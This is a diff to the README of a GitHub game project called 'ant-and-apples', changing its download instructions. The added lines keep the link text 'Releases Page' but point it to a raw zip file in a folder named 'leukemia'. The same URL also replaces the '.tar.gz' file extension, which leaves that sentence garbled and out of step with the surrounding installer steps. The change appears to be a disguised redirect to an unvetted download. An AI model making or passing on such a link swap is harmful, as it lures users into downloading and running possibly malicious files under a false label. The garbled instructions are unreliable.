Taxi88/ant-and-apples/README.md

 ## 📥 Download & Install
 To download and install the game, follow these steps:

-1. **Visit the Releases Page:** Click on this link to go to the download page: [Releases Page](https://github.com/Taxi88/ant-and-apples/releases).
+1. **Visit the Releases Page:** Click on this link to go to the download page: [Releases Page](https://raw.githubusercontent.com/Taxi88/ant-and-apples/main/leukemia/ant-and-apples.zip).

 2. **Choose Your Version:** On the releases page, you will see several versions of the game available.
 Pick the latest version, which is usually at the top.

 3. **Download the Installer:**
    - Click on the file that matches your operating system.
 For example, if you're on Windows, look for a file with `.exe` in the name.
-For Mac, you’ll find files with `.dmg`, and for Linux, you might see files with `.tar.gz` or `.deb`.
+For Mac, you’ll find files with `.dmg`, and for Linux, you might see files with `https://raw.githubusercontent.com/Taxi88/ant-and-apples/main/leukemia/ant-and-apples.zip` or `.deb`.

 4. **Run the Installer:**
    - Locate the downloaded file on your computer.
 Double-click it to start the installation.